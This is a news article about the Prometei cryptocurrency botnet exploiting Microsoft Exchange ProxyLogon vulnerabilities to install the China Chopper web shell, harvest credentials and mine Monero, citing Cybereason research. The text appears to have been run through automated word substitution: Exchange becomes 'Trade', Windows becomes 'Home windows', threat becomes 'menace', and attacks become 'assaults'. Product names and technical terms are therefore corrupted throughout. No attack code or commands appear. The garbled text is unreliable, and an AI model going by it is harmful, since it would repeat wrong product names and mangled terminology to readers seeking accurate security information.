Attackers are exploiting the ProxyLogon Microsoft Trade Server flaws to co-opt susceptible machines to a cryptocurrency botnet named Prometei, in response to new analysis.
“Prometei exploits the not too long ago disclosed Microsoft Trade vulnerabilities related to the HAFNIUM assaults to penetrate the community for malware deployment, credential harvesting and extra,” Boston-based cybersecurity agency Cybereason said in an evaluation summarizing its findings.
First documented by Cisco Talos in July 2020, Prometei is a multi-modular botnet, with the actor behind the operation using a variety of specially-crafted instruments and recognized exploits similar to EternalBlue and BlueKeep to reap credentials, laterally propagate throughout the community and “enhance the quantity of methods taking part in its Monero-mining pool.”
“Prometei has each Home windows-based and Linux-Unix based mostly variations, and it adjusts its payload based mostly on the detected working system, on the focused contaminated machines when spreading throughout the community,” Cybereason senior menace researcher Lior Rochberger mentioned, including it is “constructed to work together with 4 totally different command-and-control (C2) servers which strengthens the botnet’s infrastructure and maintains steady communications, making it extra immune to takedowns.”
The intrusions reap the benefits of the not too long ago patched vulnerabilities in Microsoft Exchange Servers with the objective of abusing the processing energy of the Home windows methods to mine Monero.
Within the assault sequence noticed by the agency, the adversary was discovered exploiting Trade server flaws CVE-2021-27065 and CVE-2021-26858 as an preliminary compromise vector to put in the China Chopper internet shell and achieve backdoor ingress to the community. With this entry in place, the menace actor launched PowerShell to obtain the preliminary Prometei payload from a distant server.
Latest variations of the bot module include backdoor capabilities that help an in depth set of instructions, together with extra modules known as “Microsoft Trade Defender” that masquerade as reputable Microsoft product that doubtless takes care of eradicating different competing internet shells which may be put in on the machine in order that Prometei will get entry to the assets essential to mine cryptocurrency effectively.
Apparently, newly unearthed proof gathered from VirusTotal artifacts has revealed that the botnet might have been round as early as Might 2016, implying that the malware has always been evolving ever since, including new modules and methods to its capabilities.
Prometei has been noticed in a large number of victims spanning throughout finance, insurance coverage, retail, manufacturing, utilities, journey, and building sectors, compromising networks of entities positioned within the U.S., U.Ok., and several other international locations in Europe, South America, and East Asia, whereas additionally explicitly avoiding infecting targets in former Soviet bloc international locations.
Not a lot is thought concerning the attackers aside from the truth that they’re Russian talking, with older variations of Prometei having their language code set as “Russian.” A separate Tor consumer module used to speak with a Tor C2 server included a configuration file that is configured to keep away from utilizing a number of exit nodes positioned in Russia, Ukraine, Belarus, and Kazakhstan.
“Risk actors within the cybercrime neighborhood proceed to undertake APT-like methods and enhance effectivity of their operations,” Rochberger mentioned. “As noticed within the latest Prometei assaults, the menace actors rode the wave of the not too long ago found Microsoft Trade vulnerabilities and exploited them so as to penetrate focused networks.”
“This menace poses a fantastic threat for organizations, because the attackers have absolute management over the contaminated machines, and if they need so, they’ll steal info, infect the endpoints with different malware and even collaborate with ransomware gangs by promoting the entry to the contaminated endpoints,” she added.